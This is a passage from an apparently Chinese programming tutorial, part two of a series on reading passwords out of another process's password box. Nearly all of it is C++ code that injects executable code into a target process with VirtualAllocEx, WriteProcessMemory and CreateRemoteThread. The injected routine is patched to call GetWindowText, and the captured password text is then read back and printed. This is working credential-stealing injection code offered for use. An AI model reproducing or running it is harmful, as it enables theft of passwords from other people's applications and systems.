获取其它进程密码框中的密码(二)

ndReadAddr = (DWORD)EndLabel;
#endif


dwCodeLen = dwEndReadAddr - dwSpyRealAddr;


LPBYTE pCode = (LPBYTE)VirtualAllocEx(hProcess, 0, dwCodeLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
LPBYTE pCodeBuff = (LPBYTE)malloc(dwCodeLen);
memcpy((LPVOID)pCodeBuff, (LPVOID)dwSpyRealAddr, dwCodeLen);


// 调整代码
LPBYTE p = pCodeBuff;
while(*p != 0xE8){p++;}


*(DWORD*)(p+1) = (DWORD)&GetWindowText - (DWORD)(p - (LPBYTE)pCodeBuff + (LPBYTE)pCode) - 5;
WriteProcessMemory( hProcess, pCode, pCodeBuff, dwCodeLen, NULL);


HANDLE hRThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pCode, pData, 0, 0);
WaitForSingleObject(hRThread, INFINITE);


char szTitle[100] = {0};
DWORD dwReadBytes = 0;
ReadProcessMemory(hProcess, pData + 8, szTitle, dwTitleSize, &dwReadBytes);


cout << szTitle << endl;


CloseHandle(hRThread);
free(pCodeBuff);
VirtualFreeEx(hProcess, pCode, dwCodeLen, MEM_RELEASE);
VirtualFreeEx(hProcess, pData, dwDataLen, MEM_RELEASE);
CloseHandle(hProcess);
}